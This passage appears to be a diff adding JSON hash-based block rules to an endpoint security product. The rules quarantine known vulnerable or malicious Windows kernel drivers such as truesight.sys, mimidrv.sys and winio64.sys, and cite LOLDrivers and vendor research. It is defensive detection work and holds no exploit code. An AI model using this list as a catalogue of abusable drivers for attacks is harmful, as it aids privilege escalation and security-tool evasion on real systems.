"2026-03-23T11:45:30.476019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476028Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4cd80f4e33b713570f6a16b9f77679efa45a466737e41db45b41924e7d7caef4", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26972ca1-43f9-59bf-a417-675280ad5003", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.467122Z", + "creation_date": "2026-03-23T11:45:30.467125Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.467134Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7af0efdd72c68fdd105bb73be148ab7bf78a157cb1b241a85362a5bc5da91bd8", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26a6443a-f007-57ff-9d69-cc9cb00469ba", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489428Z", + "creation_date": "2026-03-23T11:45:31.489431Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489438Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"772d31d79540f53faf5ed28a387cc99e23407ab295d3693851fe965636c78e43", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26aaf21a-8cd9-50e0-a94b-2e70e4581ad1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811814Z", + "creation_date": "2026-03-23T11:45:31.811816Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811822Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "efc3f6440458ec128e330625cf51b5bda7b263d0e5e1cfef9afd30d72a9e73f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26b2151d-ada0-5833-ac6e-1bf1c701dd67", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493435Z", + "creation_date": "2026-03-23T11:45:31.493437Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "03390ac3179dc0e5ab229aef1a92432fc1ffe9df1071b03428ca1a79e86ff8f4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26b45be2-6bf6-5870-8a3e-0309852fabbe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140944Z", + "creation_date": "2026-03-23T11:45:31.140954Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140960Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8d8efa46efdfdfc8f675d8c6e3a7e51e07ae18d12494eedd73bb6baf557fef30", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26c36caf-918e-5c49-824c-6d2190f00e86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142417Z", + "creation_date": "2026-03-23T11:45:31.142419Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142424Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cd8d5c2713d271898bbd78a5e0abf8986ae9c13745f825b3930c2ada5471f3d3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26c50bb7-0e62-581c-b0f7-29f04cb44a27", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:30.832497Z", + "creation_date": "2026-03-23T11:45:30.832499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832504Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7265f79ec6c42608f45fdf76ad40036961cd4f2dc363c4be17945072b609d584", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26cc6f6a-c6a1-5e5c-b663-93b9bdfb420c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820670Z", + "creation_date": "2026-03-23T11:45:31.820673Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "721355b5059f9d9848904d7e5aefd6699894572e124b64eefd7e85e24d4718e8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + 
"source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26d63f78-52d9-5f3f-9472-18070b6219f0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619648Z", + "creation_date": "2026-03-23T11:45:29.619650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35", + "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26dcffe7-19fa-5ecf-a693-d01afd4d363c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.472583Z", + "creation_date": "2026-03-23T11:45:31.472586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.472595Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aaf2de85b1b2273e7c8219501fb64d3a2e619482886f44943cf0a08249a9ad08", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26e9eaca-e011-5b8c-9dcf-3d55a3bba399", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982325Z", + "creation_date": "2026-03-23T11:45:29.982327Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf", + "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26eaa7ee-31ce-52da-9788-6487b7853f37", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480451Z", + "creation_date": "2026-03-23T11:45:30.480453Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480458Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6d1ee0455068b74cf537388c874acb335382876aa9d74586efb05d6cc362ae5", + "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26edeed9-0339-5a3e-bd71-040559cebecd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.819544Z", + "creation_date": "2026-03-23T11:45:31.819547Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819556Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"b0bda209a54ce2eefdee85a78d7ef74c6895df59d61491e61b8955792fbf00cf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "26f04b06-51e1-59a2-ab5e-d0788f75290a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156586Z", + "creation_date": "2026-03-23T11:45:31.156588Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156593Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e18fb11eb435c9b2ebd3bf0798bf5e82c2d48c225e51a2f21190c36f94b32337", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "271bb663-62ed-53d7-902b-a7f7fcfc2c4a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494492Z", + "creation_date": "2026-03-23T11:45:31.494494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494500Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ca6e8b9f468bb37760c53e11323052fe506f4290a4bae5d4a3ff6c59338bb6c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "271eb340-7270-57d5-96ac-ec1108392ce3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148060Z", + "creation_date": "2026-03-23T11:45:31.148062Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46fbac19393a95999b24bab3d0f6fa027781ece014aeb09197d2968b0b260a0b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27283ed3-7201-5b9f-b086-f0c766515683", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.463942Z", + "creation_date": "2026-03-23T11:45:30.463952Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.463961Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8684aec77b4c3cafc1a6594de7e95695fa698625d4206a6c4b201875f76a5b38", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "272f120e-e794-507d-93d3-da9e49da91c7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826999Z", + "creation_date": "2026-03-23T11:45:30.827001Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827007Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e88fa4916eb1c2c5dede1a8a3ce2b868e6ed28b845c05694e54c136ab9a9fcc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27536930-523c-51ee-b6fe-09db02f7ceb9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.144375Z", + "creation_date": "2026-03-23T11:45:31.144377Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.144382Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ccb6149fd214027de4fff2fcde8040b009d6c9e397523914a4512a8e71510a4b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"2757b5f1-b6aa-5cb9-8fc5-52943094930c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.480134Z", + "creation_date": "2026-03-23T11:45:30.480136Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.480141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9e0c2a569ab02742fa3a37846310a1d4e46ba2bfd4f80e16f00865fc62690cb", + "comment": "Vulnerable Kernel Driver (aka IoAccesssys.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "2762d5e1-3063-5305-a155-73a580ac208c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818172Z", + "creation_date": "2026-03-23T11:45:30.818174Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.818180Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b074caef2fbf7e1dc8870edccb65254858d95836f466b4e9e6ca398bf7a27aa3", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27667b97-5ddc-5f3d-8f8d-b4ef2072d05d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981570Z", + "creation_date": "2026-03-23T11:45:29.981573Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981578Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e2ec3b2a93c473d88bfdf2deb1969d15ab61737acc1ee8e08234bc5513ee87ea", + "comment": "Vulnerable Kernel Driver (aka gametersafe.sys) [https://www.loldrivers.io/drivers/1ab1ec8c-1231-4ba4-8804-4a2cda103bb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "27671ae9-422c-59b8-9cb2-f15aa17b3f64", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471410Z", + "creation_date": "2026-03-23T11:45:30.471413Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471423Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1997e2a6302f3196975f858fef63188a249f79b6c2982d31ae07405e8aada58f", + "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "276755f2-5b5d-5a6a-85b0-9a65b6019104", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604772Z", + "creation_date": "2026-03-23T11:45:29.604774Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604779Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "69527aa5ad089d9731e0054a32c9626a8d25416664f8d9b444bec674ba695ad5", + "comment": "Process Hacker driver (aka 
